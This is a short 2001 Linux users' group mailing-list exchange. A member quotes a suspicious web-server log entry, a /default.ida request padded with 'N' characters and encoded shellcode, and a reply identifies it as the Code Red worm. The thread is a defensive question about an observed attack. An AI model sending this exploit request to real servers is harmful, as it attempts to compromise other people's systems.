[plug] Apache Exploit?
Ben Jensz
jensz at wn.com.au
Sat Aug 4 01:02:30 WST 2001
That wouldn't possibly be Code Red would it?
/ Ben
----- Original Message -----
From: Bernard Blackham <bernard at blackham.com.au>
To: Perth Linux Users Group <plug at plug.linux.org.au>
Sent: Saturday, August 04, 2001 12:55 AM
Subject: [plug] Apache Exploit?
> List,
>
> Every now and again I've been getting requests on my web server that look
> like:
>
> xxx.xxx.xxx.xxx - - [03/Aug/2001:23:42:35 +0800] "GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9
> 090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0
> 078%u0000%u00=aHTTP/1.0" 404 205
>
> I've had that exact string about 20 times in the past 2 months from a
> number of IPs. I'm guessing it's an exploit of some sort someone's trying
> out? Should I be concerned? Running Apache 1.3.6.
>
> Regards
>
> Bernard.
>
> --
> Bernard Blackham
> bernard at blackham.com.au
>
>
More information about the plug
mailing list